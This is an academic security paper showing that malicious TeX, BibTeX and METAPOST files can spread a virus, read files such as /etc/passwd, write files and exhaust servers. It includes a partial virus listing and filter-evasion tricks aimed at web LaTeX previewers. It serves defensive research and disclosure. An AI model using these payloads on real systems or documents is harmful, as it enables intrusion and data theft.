Sie sind auf Seite 1von 8

Are Text-Only Data Formats Safe?

Or, Use This LATEX Class File to Pwn Your Computer


Stephen Checkoway Hovav Shacham Eric Rescorla
UC San Diego UC San Diego RTFM, Inc.

Abstract are all plain text and thus, naı̈vely, “safe.” LATEX and
B IBTEX files are routinely transmitted in research envi-
We show that malicious TEX, B IBTEX, and METAPOST
ronments — a practice we show is fundamentally unsafe.
files can lead to arbitrary code execution, viral infec-
Compiling a document with standard TEX distributions
tion, denial of service, and data exfiltration, through the
allows total system compromise on Windows and infor-
file I/O capabilities exposed by TEX’s Turing-complete
mation leakage on UNIX.
macro language. This calls into doubt the conventional
wisdom view that text-only data formats that do not ac- TEX is unsafe. Donald Knuth’s TEX is the standard
cess the network are likely safe. We build a TEX virus typesetting system for mathematical documents. It is
that spreads between documents on the MiKTEX distri- also a Turing-complete macro language used to inter-
bution on Windows XP; we demonstrate data exfiltration pret scripts from potentially untrusted sources. In this
attacks on web-based LATEX previewer services. paper, we show that a specific capability exposed to TEX
macros — the ability to read and write arbitrary files —
1 Introduction makes it (and other commonly used bits of TEXware,
The divide between “code” and “data” is among the most such as B IBTEX and METAPOST) a threat to system se-
fundamental in computing. Code expresses behavior curity and data privacy.
or functionality to be carried out by a computer; data We demonstrate two concrete attacks. First, as an ex-
encodes and describes an object (a photo, a spreadsheet, ample of running arbitrary programs, we build a TEX
etc.) that is conceptually inert, and examined or manip- virus that affects recent MiKTEX distributions on Win-
ulated by means of appropriate code. The complexity of dows XP, spreading to all of a user’s TEX documents.
data formats for media manipulated by desktop systems, The virus requires no user action beyond compiling an
together with the inability of programmers to write infected file. Our virus does nothing but infect other doc-
bug-free code, has generated a stream of exploits in uments, but it could download and execute binaries or
common media formats. These exploits take advantage undertake any other action it wishes.
of software bugs to induce arbitrary behavior when a Second, we describe data exfiltration and denial of ser-
user views a data file, even seemingly simple ones such vice attacks against web-based LATEX and METAPOST
as Windows’ animated cursors [16]. The inclusion of previewer services. Our findings have implications for
powerful scripting languages in file formats like Mi- any online service that compiles or hosts TEX files on
crosoft’s Word has led to so-called macro viruses,1 and behalf of untrusted users, including the Comprehensive
to PostScript documents that violate a paper reviewer’s TEX Archive Network (CTAN) and Cornell University
anonymity [3]. These two trends have combined in Library’s arXiv.org preprint server.
the use of PDF files that include JavaScript to exploit Defenses. The lesson we teach here is one learned over
bugs in Adobe’s Acrobat; by one report [19], some and over: As the Internet has made document sharing
80% of exploits in the fourth quarter of 2009 used easier and more pervasive, file formats once considered
malicious PDF files. Thus the complexity and opacity trusted have become attack vectors, either because the
of data formats has made data behave more like code. parser was insecure or because the scripting capabili-
On the other side, a line of work culminating in the ties exposed to files in the format have unforeseen con-
English-language shellcode of Mason et al. [13] has sequences. Barring a fundamental change in the way
shown how to make code look more like data. that data-handling code is designed and implemented,
In this paper, we present a case study of another un- we must set aside the idea that data, unlike code, can
safe data format, one that is of particular interest to the be “safe”; we should instead treat data-processing code
academic community: TEX. Unlike Word documents as inherently insecure and design systems that can with-
or PDF files, the input file formats associated with TEX stand its compromise — as, for example, Bernstein has
1 Amusingly, some advocacy documents list “no macro viruses” advocated [5].
as an advantage TEX has over Word; see, e.g., http://web.mit. For TEX specifically, there are three main approaches
edu/klund/www/urk/texvword.html. to protect against abuse of interpreted languages. First,

1
one could audit the interpreter for vulnerabilities that al- the text were typed directly into the main document:
low the attacker to subvert the intended restrictions on \input file (or in LATEX, \input{file}).
the scripting language. Such vulnerabilities are com- \@input LATEX internal similar to TEX’s \input.
monly found in supposedly safe file formats and fre- \@@input LATEX internal identical to TEX’s \input.
quently allow the attacker to execute arbitrary code, as \jobname TEX primitive that expands to the name of
in Dowd’s recent ActionScript exploit [8]. We know of the file being compiled without its extension.
no such vulnerabilities in TEX, but their absence does \newread (LA)TEX macro to allocate a new stream for
nothing to defend against capabilities granted to TEX file reading: \newread\file.
scripts by design, including the file I/O that forms the \openin TEX primitive that opens a file and associates
basis for our attacks. A second approach is to attempt to it with a read stream: \openin\file=foo.ext.
establish a safe subset of commands, through blacklist- \read TEX primitive that reads a line from a file, as-
ing, whitelisting, or other forms of filtering or rewriting. signing each character the category code currently
(This is akin to code-rewriting systems in which code is in effect: \read\file to\line stores the tokens
verified safe at load-time [17].) As we show below, the produced from the file into \line.
malleability of the TEX language makes it difficult to fil- \readline ε-TEX extension that behaves as \read
ter safely. A final, more drastic approach is to treat the but assigns only the category codes “other” and
entire system as untrusted and sandbox it using the op- “space.”
erating system’s isolation mechanisms; as we show, this \relax TEX primitive that takes no action; just relaxes.
seems like the most promising approach for TEX. \write TEX primitive that writes an expanded token list
Observations similar to the ones we have made for TEX to a file: \write\file{foo}.
apply to other data formats that are programmable (e.g., Other control sequences are used below, but either their
using JavaScript) or require complicated and error-prone behavior is clear or their use is not of central importance.
parsers. Ensuring that all programs that process such for- TEX parsing behavior. TEX’s behavior is usually de-
mats are appropriately sandboxed represents a reimagi- scribed in terms of a “mouth” and a “stomach.” The exact
nation of the way traditional desktop environments are behavior is fairly complex but the following simplified
engineered; a redesigned system would dovetail with the description will suffice for this paper. TEX’s mouth reads
principles laid out by Bernstein [5]. each line of input character by character and produces a
2 Low-level details of TEX stream of tokens which are acted on by TEX’s stomach.
There are two types of tokens produced by TEX’s
In this section, we recall some features of the TEX pro-
mouth — character tokens and control sequences — and
gramming language and the LATEX macro package. The
their production is governed by the category code — an
discussion covers only the behaviors on which our attack
integer in 0–15 — of the characters read. At any given
relies; for more complete coverage we refer the reader
time, each input character is associated with a single
to [6, 11, 24]. Even so, the discussion is quite technical.
category code. Except in certain situations, expand-
Readers not interested in TEX arcana are encouraged to
able tokens (e.g., macros) are expanded into other tokens
continue to Section 3, referring back to this section for
en route to TEX’s stomach. Once in the stomach, TEX
reference as necessary.
processes the tokens, performing assignments — such as
Important control sequences. TEX and LATEX behav- changing category codes — and typesetting.
ior is principally controlled by a variety of control se- When TEX encounters two identical characters tokens
quences, conventionally a sequence of characters pref- with category code 7, (by default only ˆ ), followed by
aced by a backslash (\). Below are some of the control two lowercase hexadecimal numbers, it treats the four
sequences we will use in the remainder of the paper. characters as if a single character with ASCII value the
\catcode TEX primitive that changes the category code hexadecimal number had appeared in the input.
of a character: \catcode`\X=0 changes the de-
fault category code of X from “letter” to “escape 3 Malicious TEX usage
character.” It is generally assumed that it is safe to process arbitrary,
\csname . . . \endcsname TEX primitive that builds untrusted documents with TEX, and by extension LATEX.
control sequences: \csname foo\endcsname is However, this is untrue; in fact, TEX can write arbitrary
(almost) the same as \foo. files to the filesystem. On UNIX systems, TEX output
\include LATEX macro that behaves as \input except is typically restricted to the local directory and its sub-
that the included material begins on a new page: directories, which limits the scope of attack somewhat.
\include{file}. However, MiKTEX, the most common TEX distribution
\input TEX primitive (redefined by LATEX) that reads for Windows, has no internal controls on where output
the contents of its space-separated argument as if can be written.

2
This ability to write to any file presents an obvious principle execute any JScript code and do far more dam-
danger in that important files can be overwritten or the age than just modifying LATEX files on disk.
computing environment can be changed by the intro- An earlier proof-of-concept TEX virus for NetBSD
duction of new files. The average user’s computer is a was designed in 1994 by Keith McMillan [15]. McMil-
target-rich environment, with any number of files which, lan’s modifies a user’s GNU Emacs initialization file
when modified, allow the attacker to execute code in the (something no longer possible with Web2C based TEX
user’s environment. For concreteness, we focus on a sin- distributions) and relies on the user’s visiting a directory
gle case: on Windows XP we can write JScript files to a in Emacs to spread to other .tex files in that directory.
user’s Startup directory which will be executed by the By contrast, our virus works on modern Windows sys-
Windows Script Host facility at login. tems and requires no user interaction beyond an eventual
Once the script is executed, one possibility is it could relogin.
download and run a binary of the attacker’s choice using
the Microsoft.XMLHTTP object. For example, this 3.2 B IBTEX databases
could cause the computer to become part of a botnet. One potential barrier to using TEX for application exe-
There is one technical hurdle that must be overcome cution is that the user might notice any malicious code
in order to write to the Startup directory, namely present in files he is editing. B IBTEX databases provide a
spaces in the file path, which TEX does not ordinarily two-fold solution by (1) moving the malicious code out
allow. However, we can leverage Windows’ compati- of the main document so it is less noticeable; and (2) al-
bility with older programs that expect file and directory lowing the code to be widely distributed.
names in 8.3 format. For example, StartMenu can be B IBTEX is a program used to turn a database of refer-
specified as STARTM˜1. We use this compatibility in ences (the .bib files) into LATEX code for a bibliography
our proof-of-concept for application execution, a LATEX consisting of the references for the citations in the paper
virus. (the .bbl files). Subsequent runs of LATEX cause the
text of the generated .bbl files to be \input into the
3.1 A two-stage virus
document at the specified location. It is quite common
The virus attacks in two phases. In the first phase, it for users to simply download B IBTEX entries or even en-
copies the payload to disk and install the appropriate tire databases, such as the RFC B IBTEX files provided by
JScript file into Startup. In the second phase, the Miguel Garcia Martin. In the latter case, the database
JScript file finds other LATEX documents on the disk and often contains a large number of entries which the user
infects them. does not carefully examine; indeed he may never even
The first phase takes advantage of the fact that the TEX look at the entries but rather search the database with a
engine used in MiKTEX — and indeed in all modern TEX tool such as RefTEX. This facilitates an attack since ma-
distributions — is pdfTEX which contains the ε-TEX ex- licious code may be harder to notice in a large file full of
tension \readline [23]. First, \readline is used to unused information.
read the document being compiled line by line and write Each B IBTEX entry has the form @type..., where
an exact copy to C:\WINDOWS\Temp\sploit.tmp. type is one of the types understood by a particular style
Then, a JScript file containing the second phase of the such as book or article. There is an additional entry
virus is written to the Administrator’s Startup direc- type, @preamble, which inserts text verbatim into the
tory. Since the exact details of how this is accomplished .bbl file just before the bibliography. In addition, mul-
are rather technical, they are omitted; however, the code tiple @preamble entries are concatenated into a single
for the first phase is given in Listing 1. line in the order they appear in the database. Thus, ma-
The second phase, written in JScript, first creates a licious code can be separated into arbitrarily many parts
FileSystemObject, then it reads the sploit.tmp and scattered (in order) throughout the .bib file, and
file, and extracts all of the TEX code between two marker will be executed regardless of which entries the author
lines — the virus code. Next, it finds all of the files in the actual cites.
Administrator directory with the extension .tex. Other file formats that embed TEX commands can also
Finally, those files which contain \end{document} be used as attack vectors. Examples include graphics lan-
have the virus inserted just before the end. guages such as METAPOST and Asymptote.
In total, the virus requires two marker lines and 21 80-
column lines of TEX. The TEX code is given in Listing 1;
3.3 Class and style files
in the interest of not providing a complete, working virus, Base LATEX functionality is extended through the use of
the majority of the JScript is omitted, but the remaining class files which set the overall format of the document
code is straightforward and we have tested it in our own to be produced and style files which typically change
systems. Moreover, it should be clear that we could in the behavior of one aspect of the document. At present,

3
Listing 1: Virus code with JScript omitted.
%%%%SPLOIT%%%%
{\newwrite\w\let\c\catcode\c`*13\def*{\afterassignment\d\count255"}\def\d{%
\expandafter\c\the\count255=12}{*0D\def\a#1ˆˆM{\immediate\write\w{#1}}\c`ˆˆM5%
\newread\r\openin\r=\jobname \immediate\openout\w=C:/WINDOWS/Temp/sploit.tmp
\loop\unless\ifeof\r\readline\r to\l\expandafter\a\l\repeat\immediate\closeout
\w\closein\r}{*7E*24*25*26*7B*7D\immediate\openout
\w=C:/DOCUME˜1/ADMINI˜1/STARTM˜1/PROGRAMS/STARTUP/sploit.js \c`[1\c`]2\c`\@0
\newlinechar`\ˆˆJ\endlinechar-1*5C@immediate@write
@w[fso=new ActiveXObject("Scripting.FileSystemObject");foo=ˆˆJ
h11 lines of JScript omitted i
f(fso.GetFolder("C:\\Documents and Settings\\Administrator"));}m();]
@immediate@closeout@w]}%
%%%%SPLOIT%%%%
CTAN has 1080 user contributed LATEX 2ε packages. The Listing 2: Reading a file a line at a time.
MiKTEX repository on CTAN has 1908 packages. Sim- \openin5=/etc/passwd
ilar to the situation with large B IBTEX databases, most \def\readfile{%
users never examine a style or class file. If a popular \read5 to\curline
package on one of the many CTAN mirrors were mod- \ifeof5 \let\next=\relax
ified to contain malicious code, it might affect a large \else \curline˜\\
number of LATEX users before being discovered. \let\next=\readfile
Rather than corrupting an existing package, an at- \fi
tacker could submit a package, e.g., purporting to imple- \next}%
\ifeof5 Couldn't read the file!%
ment the guidelines for submission to a conference, to
\else \readfile \closein5
CTAN. Anyone using such the package would be at risk. \fi
4 Web-based LATEX previewers The basic idea is to open a file for reading, read it one
We now turn our attention to a slightly harder target. line at a time, and feed it to the typesetting engine. The
There are more than a dozen web-based services that code for this is given in Listing 2.
compile LATEX files on users’ behalf and return the result- An additional problem is processing characters in the
ing PDFs. We have designed successful exfiltration and input that TEX considers to be special. For example, run-
file writing attacks on most of these services. Moreover, ning the code in Listing 2 on one of the authors’ com-
the filtering mechanisms devised by these services were puter produces the error “You can’t use ‘macro parameter
largely ineffective against our attacks. We have disclosed character #’ in horizontal mode.” This is easily fixed by
the vulnerabilities we found to the affected services to changing the category code for # with \catcode`\#=12
the operators, with universally positive responses. As a before the \read command in Listing 2 and restoring it
result, number of operators changed their security policy afterward. Other special characters can be handled in an
or removed the previewer altogether. analogous manner. Alternatively, the \readline primi-
tive from ε-TEX can be used.
4.1 Reading files
All properly configured web servers allow only a subset 4.2 Writing files
of the files on the computer to be visible to connecting As discussed in Section 3, Web2C-based TEX distribu-
clients. In this section, we show how we can use the tions such as teTEX and TEX Live typically only allow
power of TEX to read files from web servers that expose files to be output in the current directory or a subdi-
a LATEX interface. rectory. However, this still leaves room for attacks. A
There are various ways that an attacker can use the common way to generate images for displaying in a web
exposed LATEX interface to read files not exposed by the page is to make a temporary directory — for example in
web server. The two most obvious approaches are using /tmp — and generate the needed files inside that direc-
\input or \include to interpolate the text of the file tory. Afterward, the images are copied elsewhere or used
into the TEX input and hence the output document. One immediately and then the whole directory is deleted. A
minor problem with this approach is that we have lost previewer that generates images in a web-accessible di-
line breaks in the input file since TEX will treat them as rectory and then cleans up the specific files it knows will
spaces in the usual manner. One way to avoid losing be generated but not needed may be vulnerable to attack.
line breaks, as well as circumventing blacklisting of such For example, on a web server that allows PHP, an attacker
control sequences, is to use TEX’s ability to read files. need only open a file using \openout and use \write

4
to write PHP code, which would then be executed by the Xinput. Additionally, one can use ˆˆ5c in place of \
server when the attacker did an HTTP request for that file. as described in Section 2. Of course, other characters
If the previewer is based on MiKTEX, these constraints could be replaced, not simply \, for example, if the word
are relaxed and attack is even easier. “input” is not allowed anywhere in the previewer’s input,
then ‘p’ can be replaced with ˆˆ70.
4.3 Denial of service
Yet another possibility is for an attacker to invoke
Any previewer that allows the TEX looping construct \@input or \@@input directly — this requires using ei-
\loop . . . \repeat or the definition of new macros is ther \makeatletter or \catcode to change the cate-
at risk of a denial of service attack. The shortest form gory code of @ to “letter.” In all likelihood, there are a
of this attack is \loop\iftrue\repeat. Another way number of LATEX internals that could be used to facilitate
to achieve this is to use \def\nothing{\nothing}. an attack. These are much less well known outside of the
The loops cause TEX to burn CPU cycles without actually package writing community and are thus likely to escape
producing anything. If enough instances of it happen at the notice a web site administrator attempting to secure a
once, the computer will slow to a crawl and no more use- LATEX previewer.
ful work will be possible until the processes are killed. One can make use of a peculiarity of the implementa-
One extension of this attack is to cause TEX to pro- tion of LATEX environments to evade filters that look for
duce very large files, potentially filling up the disk. The control sequences starting with \. A LATEX environment
way to do this without exhausting TEX’s memory is to foo consists of a pair \begin{foo} . . . \end{foo}.
produce pages of output so that TEX will discard from its The \begin{foo} and \end{foo} macros execute the
memory the pages it has already processed. This can be control sequences \foo and \endfoo using \csname.
done using \shipout — a TEX primitive that writes the Thus, one can execute any control sequence by pass-
contents of the following box to the output file. ing its name as the argument to \begin. If \endfoo
4.4 Escaping math mode is not defined, TEX defines it as \relax. For ex-
Many of the LATEX previewers on the web were designed ample, \begin{TeX}\end{TeX} eventually executes
\TeX\relax. Since the backslash before the control
only to display mathematics. As a result, the text that
the user inputs is copied into a mathematics environ- sequence name is not present when using \begin, it
ment in an otherwise-complete LATEX document to pass does not trigger a filter looking for particular control
off to LATEX for compilation. The most common way sequences which begin with \. One can pass argu-
to do this is to put the input inside a eqnarray* or ments to a macro simply by placing the argument af-
align* environment. To get out of math mode, we
ter the \begin. For example, one can read files with
\begin{input}{/file/path}\end{input}.
simply start the input with \end{eqnarray*} (resp.
\end{align*}) and to ensure that the document com- 4.6 METAPOST
piles, we end the input with \begin{eqnarray*} (resp.
\begin{align*}). Alternatively, to get out of math METAPOST is a declarative, macro programming lan-
mode temporarily, we can use \parbox. guage, based on METAFONT, used to produce vector
graphics, often for inclusion into (LA)TEX documents.
4.5 Evading Filters Like TEX, METAPOST is an extremely powerful lan-
The natural defense against the attacks described in this guage and as such, there are dangers associated with pro-
section is to filter out dangerous commands. However, viding a METAPOST previewer on the web.
this is more difficult than it first appears. In this section, The first such danger is the ability to write arbitrary
we describe a number of techniques for evading simple single line TEX fragments. Any literal text that ap-
filters. For concreteness, the discussion below is limited pears between btex and etex is written to a tex
to \input, but most of the techniques are applicable to file which is compiled by TEX and the result is in-
all the commands discussed above. cluded into the METAPOST output; this is often used
Using some of the features and control sequences de- for typesetting labels. METAPOST provides a way
scribed in Section 2, we can use \input without having to include arbitrary, multi-line TEX code at the begin-
to write the literal string \input. For example, we can ning of the tex file used with btex...etex using
use \csname input\endcsname. This attack is more the verbatimtex...etex construct. The latexMP
likely to succeed than \input because \csname is used package makes using LATEX for typesetting easy. It in-
mostly by package writers and only rarely by authors. cludes a macro textext which takes a string argument
An attacker can evade simpleminded filters by using containing a single line of LATEX to typeset. As a result,
\catcode to change the category code of another char- all of the attacks discussed thus far work just as well for a
acter to “escape” and use that in place of \. For exam- METAPOST previewer that allows the btex...etex
ple, one can change the category code of ‘X’ and use construction or allows the use of the latexMP package.

5
Listing 3: Reading a file with METAPOST. Listing 4: Creating 4096 files per minute with META-
picture p; POST.
p := nullpicture; filenametemplate "%j%c%y%m%d%H%M";
forever: i := 0;
string line; forever:
line := readfrom "/etc/passwd"; beginfig(i);
exitif line = EOF; % Add METAPOST code here
p := thelabel.lrt( line, endfig;
(0, ypart llcorner p) ); if i = 4095:
draw p; i := 0;
endfor; else:
i := i + 1;
Even worse, from a web site administrator’s point of fi;
view, is that since latexMP allows strings and not just lit- endfor;
eral data to be typeset, attempting to sanitize input to the
gle infinite loop is produced to check for the presence of
textext macro requires performing a data flow anal-
timeouts.2 No attempts were made to write files, conse-
ysis that can prove that no harmful control sequences
quently those attacks are unevaluated. Table 1 contains
make it into the string ultimately used as the argument.
the results of the attacks. As can be seen, the majority of
A second danger is that METAPOST includes com-
the attacks were successful.
mands for reading and writing files, readfrom and
write, respectively. To read an arbitrary file such as 4.7.1 Equation previewers
/etc/passwd, we can use the code in Listing 3. The first group of LATEX previewers in Table 1 [4, 7,
As seen in Listing 3, METAPOST has a command 12, 14, 18, 22] are meant to display a single mathemat-
forever that loops forever. In addition to forever, ical statement at a time. Many of the previewers’ au-
METAPOST allows macro definitions via def which thors took precautions against several of the file reading
can be used to simulate looping. As before, we can ac- attacks described in Section 4.1 by attempting to pre-
tually do more than simply burn CPU cycles. We can process the input and either remove or disallow partic-
try to write large files or write many files. For exam- ular portions of input with varying degrees of success.
ple, Listing 4 will produce a maximum of 4096 files per All of them neglected to account for the TEX primitive,
minute. This limit is due to METAPOST’s maximum \openin and all were potentially vulnerable to denial of
numeric value being slightly under 4096. service attacks via infinite loops using either \loop or
One final avenue of attack against a METAPOST pre- \def.
viewer is to use the scantokens command. It takes a 4.7.2 Full document previewers
string argument and reads the string as if the contents had
been written literally in the file at that point, with a few The second group of LATEX previewers in Table 1 [1, 9,
exceptions. In particular, any of the attacks listed here 20, 21, 26, 27] are meant to display a complete LATEX
could be created using string operations and then passed document. By their very nature, full document preview-
to scantokens. ers must be permissive if they are to be useful. Full doc-
ument previewers are potentially vulnerable to all of the
4.7 Evaluation same vulnerabilities as the equation previewers as well as
We tested the aforementioned attacks against a variety vulnerabilities that come from allowing the inclusion of
of web sites running LATEX previewers. The previewers packages. For example, the Listings package, designed
examined vary in the type of content they were meant to to typeset source code listings, can be used to read and
accept from a single mathematical expression to an entire display text files. All of the full document previewers we
LATEX document. evaluate except for ScribTEX — which employs several
Since our goal was to probe but not attack these web of the defenses discussed in Section 4.8 — are vulnera-
sites, file reading was restricted to files with no security ble to all of the attacks except \input.
implications such as /etc/hostname on UNIX and 4.7.3 MathTran
C:\WINDOWS\win.ini on Windows. Rather than ac- MathTran [25] was designed as a TEX previewer with
tually produce multiple infinite looping instances, we test security in mind. MathTran uses Secure plain TEX, a
that macros can be defined by defining benign macros us-
2 Since webservers typically have timeouts of several minutes for
ing \def, \gdef, etc. Looping via \loop is attempted
CGI — for example, Apache and IIS both default to five minutes —
using the code in Listing 5. If \loop is allowed, the frag- this infinite loop causes no real damage. However, the timeout is long
ment will output “before after before.” Once it has been enough that a real attacker attempting a denial of service would simply
determined which of the looping constructs work, a sin- have to create new infinite loops every few minutes.

6
\loop \def \input \@input \csname \catcode ˆˆ5c \openin \begin
LATEX Eqn. Ed. for the Internet [4] X X X X X
Roger’s Online Eqn. Ed. [7] X X X X X X X X X
LATEX Eqn. Ed. [12] X X X X X X X X
mathURL† [14] X X X X X X X X
Hamline LATEX Eqn. Ed. [18] X X X X X X X X X
MathBin.net [22] X X X X X X X X
ScribTEX‡ [1] X X
LATEX Previewer [9] X X X X X X X X
ScienceSoft LATEX [20] X X X X X X X X
LATEXLab [21] X X X X X X X X X
LATEX Online Compiler [26] X X X X X X X X
Web LATEX [27] X X X X X X X X X
MathTran [25]

Table 1: LATEX previewer vulnerabilities. The \loop and \def columns contain a X if the attack could be used to cause a
denial of service by producing an infinite loop. The other columns contain a X if the attack can be used to read input.
† The only files we were able to read were the input and the ones produced by LAT X. It is unknown if others were accessible.
E
‡ The previewer contains a timeout of several seconds.

Listing 5: Testing for \loop. viewer to be useful, the list of acceptable control se-
\newif\iffoo\footrue quences would be quite large. MathTran [25] takes a
\loop before similar approach, except that rather than have a prepro-
\iffoo after \foofalse cessing step, plain TEX itself is completely reimple-
\repeat mented.
reimplementation of plain TEX that prevents using any Rather than preprocessing the input, a better approach
control sequence other than those meant for typesetting. leverages the power of TEX to perform the input sani-
As a result, all of the attacks described above fail, with tization. The mathURL previewer [14] takes this ap-
the one exception of escaping from math mode. This is proach by redefining \input and \include to be no-
the most secure web-based previewer we evaluate. op macros that just expand to their own arguments. Had
\@@input been redefined instead, the majority of the
4.7.4 METAPOST file reading attacks would have failed since all of LATEX’s
The one METAPOST previewer we evaluate [10] is vul- input macros rely on \@@input. Similar to blacklist-
nerable to reading and writing files using the META- ing, this approach requires deciding on a set of disal-
POST commands. It is also vulnerable to all of the at- lowed macros and then redefining them; however, it does
tacks that [9] is vulnerable to using the btex...etex not fall prey to using the ˆˆ5c, \catcode, \csname,
construct. or \begin attacks with the redefined macros. As with
blacklisting, it still requires knowing which control se-
4.8 Defenses against attacks quences to redefine.
As we have seen, simply filtering out macros deemed A more promising approach for preventing TEX from
unsafe is problematic. First, the list of macros that reading sensitive files is to leverage TEX runtime configu-
would need to be blacklisted is quite large, especially ration parameters. Web2C-based TEX distributions con-
if the user can add additional packages. For example, tain the runtime configuration parameter openin any
the LATEX 2ε kernel alone defines the macros \include, that, when set to p, for “paranoid,” disallows reading any
\input, \@input, \@iinput, \@input@, \@@input, files in a parent directory. By default, this parameter is
and \InputIfFileExists [6]. Second, style and class set to allow any files to be read. This relies on the par-
files can contain additional macros for reading files, for ticular TEX implementation correctly implementing this
example \lstinputlisting from the listings package parameter. Unfortunately, MiKTEX does not contain a
or \verbatiminput from the verbatim package. The similar configuration parameter. A similar parameter for
blacklisting approach seems unlikely to succeed without Web2C-based distributions controls writing.
a complete understanding of TEX and LATEX. A second approach (which can be used in concert with
Instead of blacklisting unsafe macros, we could in- the first) is to run TEX in an operating system jail con-
stead whitelist macros deemed safe. This approach taining just the files needed for the TEX distribution. This
seems difficult to implement and verify successfully. For approach has two major advantages. First, it is not sen-
example, it would be easy to overlook the fact that ˆˆ5c sitive to details of the TEX implementation. Second, it
starts a new control sequence. In addition, for the pre- allows us to leverage existing work on process isolation.

7
We note that ScribTEX uses both the configuration and [9] Troy Henderson. LATEX previewer.
jail approaches and this is the reason it is impervious to http://www.tlhiv.org/ltxpreview.
all of the file reading attacks [2]. [10] Troy Henderson. METAPOST previewer.
Defending against denial of service attacks only re- http://www.tlhiv.org/mppreview.
quires a timeout short enough to ensure that the server [11] Donald E. Knuth. The TEXbook. Addison-Wesley
does not get overwhelmed. Professional, 1986.
5 Conclusions [12] LATEX equation editor.
http://www.sitmo.com/latex.
Conventional wisdom in security distinguishes between
“safe” and “unsafe” data files. Binary files are more risky [13] Joshua Mason, Sam Small, Fabian Monrose, and Greg
than text files; content that interacts with the network MacManus. English shellcode. In Somesh Jha and
is more risky than purely local content. In this paper, Angelos Keromytis, editors, Proceedings of CCS 2009,
we argue that even seemingly safe data files can be un- pages 524–33. ACM Press, November 2009.
safe. Although TEX documents are plain text, manipu- [14] mathURL. http://mathurl.com.
lating maliciously constructed LATEX documents or class [15] Keith Allen McMillan. A platform independent
files, B IBTEX databases, or METAPOST graphics files computer virus. Master’s thesis, The University of
can lead to arbitrary code execution, viral infection, de- Wisconsin—Milwaukee, April 1994. Online:
nial of service, and data exfiltration. http://vx.netlux.org/lib/vkm00.html.

Acknowledgments [16] Microsoft. Vulnerabilities in GDI could allow remote


code execution (925902). Microsoft Security Bulletin
We thank Stefan Savage for numerous helpful conversa- MS07-017, April 2007. Online:
tions; Troy Henderson for letting us experiment exten- http://www.microsoft.com/technet/
sively with his LATEX and METAPOST previewers; llll security/Bulletin/MS07-017.mspx.
from FreeNode’s #latex for pointing out the \begin at- [17] George C. Necula and Peter Lee. Safe kernel extensions
tack; and the anonymous reviewers for their helpful com- without run-time checking. In Karin Peterson and Willy
ments. Zwaenepoel, editors, Proceedings of OSDI 1996, pages
229–43. USENIX, ACM SIGOPS, and IEEE TCOS,
References October 1996.
[1] James Allen. ScribTEX.
[18] Andy Rundquist. Hamline university physics department
http://www.scribtex.com.
LATEX equation editor. http://www.hamline.
[2] James Allen. Personal communication, April 2008. edu/˜arundquist/equationeditor.
[3] Michael Backes, Markus Dürmuth, and Dominique [19] ScanSafe. Annual global threat report. Online:
Unruh. Information flow in the peer-reviewing process http://www.scansafe.com/downloads/gtr/
(extended abstract). In Birgit Pfitzmann and Patrick 2009_AGTR.pdf, 2009.
McDaniel, editors, Proceedings of IEEE Security &
Privacy 2007, pages 187–191. IEEE Computer Society, [20] ScienceSoft LATEX.
May 2007. http://sciencesoft.at/latex/?lang=en.

[4] Will Bateman and Steve Mayer. LATEX equation editor [21] Bobby Soares. LATEXLab.
for writing mathematics on the internet. http://www.latexlab.org.
http://www.codecogs.com/components/ [22] Mark A. Stratman. MathBin.net.
equationeditor/equationeditor.php. http://mathbin.net.
[5] Daniel J. Bernstein. Some thoughts on security after ten [23] Hàn Thê´ Thành, Sebastian Rahtz, Hans Hagen, Harmut
years of qmail 1.0. In Ravi Sandhu and Jon A. Solworth, Henkel, Pawł Jackowski, and Margin Schröder. The
editors, Proceedings of CSAW 2007, pages 1–10. ACM pdfTEX user manual, January 2007.
Press, November 2007. Invited paper.
[24] The NT S Team. The ε-TEX manual.
[6] Johannes Braams, David Carlisle, Alan Jeffrey, Leslie Max-Planck-Institut für Physik, February 1998.
Lamport, Frank Mittelbach, Chris Rowley, and Rainer
Schöpf. The LATEX 2ε sources, December 2005. [25] The Open University. MathTran – Online translation of
mathematical content.
[7] Roger Cortesi. Roger’s online equation editor. http://mathtran.open.ac.uk.
http://rogercortesi.com/eqn/index.php.
[26] Annett Thüring. LATEX online compiler. http:
[8] Mark Dowd. Application-specific attacks: Leveraging
//nirvana.informatik.uni-halle.de/
the ActionScript virtual machine.
˜thuering/php/latex-online/latex.php.
http://documents.iss.net/whitepapers/
IBM_X-Force_WP_final.pdf, April 2008. [27] Web LATEX. http://dev.baywifi.com/latex.

Das könnte Ihnen auch gefallen